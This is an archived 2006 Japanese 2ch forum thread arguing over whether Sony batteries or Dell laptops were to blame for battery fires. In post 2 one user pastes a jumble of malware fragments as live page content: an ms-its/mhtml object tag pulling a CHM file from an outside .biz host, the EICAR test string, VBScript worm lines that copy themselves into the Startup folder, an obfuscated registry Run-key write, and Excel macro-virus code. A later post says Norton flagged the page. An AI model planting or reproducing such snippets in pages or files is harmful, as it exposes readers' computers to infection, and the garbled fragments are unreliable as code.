2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

SONYが悪いのにDELLのせいにされてる件

1 :名無しさん:2006/08/16(水) 16:29:59 0
調子こいて叩いてるVAIOその他雑魚メーカーPC信者がむかつくんですが
PC初心者の癖に


2 :名無しさん:2006/08/16(水) 16:37:37 0
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

3 :名無しさん:2006/08/16(水) 16:38:41 0
イヤァアァァァアアア

4 :名無しさん:2006/08/16(水) 16:41:21 O
2ちゃんのPC板で文句言ってる奴の大半がPCに詳しくない件

サポートに文句言う前に自分の無知を恥じるべき

5 :名無しさん:2006/08/16(水) 16:46:01 0
パソコン買うならここねhttp://search.msn.co.jp/results.aspx?v=1&RS=CHECKED&CY=ja&FORM=MSNH&q=want-pc

6 :名無しさん:2006/08/16(水) 17:17:51 0
こういう連中は放置して画面の前でニヤニヤしてるのが正しい対応。

7 :DELL以外もヤバイ模様です:2006/08/16(水) 17:24:04 0
137 名前:[Fn]+[名無しさん] [sage] 投稿日:2006/08/16(水) 13:21:11 ID:ExNfKB7x    New!!
SS S5です

朝会社に行き、デスクのS5を見るとなんか浮き上がっていたので、
おかしいなと思ってみてみたらバッテリーが厚さが4cmくらいに膨らんでケースが割れてました。
もしかしてDELLと同じじゃないのかな・・・
バッテリーの中にSONY FUKUSHIMAって印刷されてるんだけど。

これってメーカーに言った方がいいのかな


138 名前:[Fn]+[名無しさん] [sage] 投稿日:2006/08/16(水) 14:43:41 ID:nsAQaXuW    New!!
証拠保全w と消費生活センターへのチクリもぜひ同時進行で

139 名前:137 [sage] 投稿日:2006/08/16(水) 15:36:05 ID:ExNfKB7x    New!!
>138

こんなんだけど

ttp://para-site.net/up/data/14225.jpg
ttp://para-site.net/up/data/14226.jpg



8 :名無しさん:2006/08/16(水) 22:27:37 0
糞SONYはDELLに謝罪と賠償すべき

9 :名無しさん:2006/08/16(水) 22:53:37 0
>>7
のやつは東芝って書いてることはダイナブックだよな・・・・・
ソニー汚染が他メーカーまで進んでるのかおそろしす

10 :名無しさん:2006/08/16(水) 23:01:21 0
DELLヤバス

11 :名無しさん:2006/08/17(木) 01:20:07 0
原因がSONY電池だけであの炎上ぶりなら、大変な騒ぎになるぞ。
他のメーカーにも売っているだろうし、PC以外にも使ってる機器は
多いから、大きめのモバイル機器全般、炎上の可能性があることになる。

12 :名無しさん:2006/08/17(木) 02:07:09 0
総研が悪いのにヒューザーのせいにされてる件

13 :名無しさん:2006/08/17(木) 04:19:56 0
>7
パンパンだぜ

14 :名無しさん:2006/08/17(木) 07:09:45 0
350億円か、粗nyは終了いたしました。長いことご愛顧ありがとうございました。

15 :名無しさん:2006/08/17(木) 11:58:25 0
ヒント:VAIOノートでは事故はおきてない

16 :名無しさん:2006/08/17(木) 14:19:24 0
VAIOは1年でバッテリー死ぬからね

17 :名無しさん:2006/08/17(木) 15:20:26 0
まぁ安さに釣られて買ったくせに
DELLノートは旧IBMや東芝と互角以上、一流メーカーw
とか抜かしてた連中にはいい薬になったんじゃないですか

18 :名無しさん:2006/08/17(木) 16:55:52 0
【社会】ソニーのバッテリー問題 アップル除くPCメーカー各社は安全を確認
http://news19.2ch.net/test/read.cgi/newsplus/1155799885/

好事家が集まる有名所のノートPC総合個人サイトでは
どこもデルの責任(実際のDELLユーザーの多くも多いんだが彼らも含めて)って論調なんだよね
2chだけがズレてる不思議

19 :名無しさん:2006/08/17(木) 17:12:38 0
>18
そのサイトってどこ?私の知らないところのような気がする。ヒントでいいのでplz

20 :名無しさん:2006/08/17(木) 20:12:20 0
要するに・・・
DELLとSONYの相性が悪い。
どちらか片方では、問題は表面化せず。

21 :名無しさん:2006/08/17(木) 21:37:38 0
>19
17時過ぎたら返事かえってこないんじゃね?

22 :名無しさん:2006/08/18(金) 02:28:07 0
DELL乙

爆弾PCが発覚してから、随分経ってから回収とはずいぶん、日本人を舐めてるね

23 :名無しさん:2006/08/18(金) 07:57:52 0
>>19
ヤフーからアク禁くらってるのか?
http://headlines.yahoo.co.jp/hl?a=20060817-00000015-reu-bus_all

24 :名無しさん:2006/08/18(金) 15:19:42 0


 発火の根本的な原因は「ソニー製バッテリー」に有り(ソニーが不具合を認めている)

 発火の引き金は「DELLの充電回路」に有り(ただし、正常なバッテリーを使えば問題なし)




25 :他のメーカーが「安全と認識」した理由:2006/08/18(金) 15:22:06 0
822 :名刺は切らしておりまして :2006/08/17(木) 21:32:33
他社はなんでオブラートに包むようなコメントするのかね
「安全と認識した」って言うけどさ、回路のおかげで発火しないってだけだろ。
電池に不具合がある以上、駆動時間や充電関連で不具合が出るのは当然だろ。
運悪いユーザーは有料修理で扱われているかもな

824 :名刺は切らしておりまして :2006/08/17(木) 21:35:21
> 822
安全に壊れるっていう意味だろw
メーカーがなんでそこまで強気なのかの一つの可能性が「電池=消耗品」であること。
保証規定に消耗品は保証しないって明記してるから、1年ぐらいたってからトラブル出ても
寿命で逃げ切れるという腹積もりじゃないかと妄想。

827 :名刺は切らしておりまして :2006/08/17(木) 21:40:17
> 824
なるほどね・・
ソニーと連んでる他のメーカーも最悪ってことだな、泣きをみるのはいつもユーザーってか・・

26 :名無しさん:2006/08/18(金) 15:57:12 0
この板見たらノートンが検出したんだけど。
みんな気をつけて

27 :名無しさん:2006/08/18(金) 16:25:40 0
>>15
出荷前に、工場ごと燃えたからな。
(郡山工場だっけ?)

28 :名無しさん:2006/08/19(土) 01:16:38 0
>23
いや...

>好事家が集まる有名所のノートPC総合個人サイトでは

これのこと。蹴茶ではないよね。

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)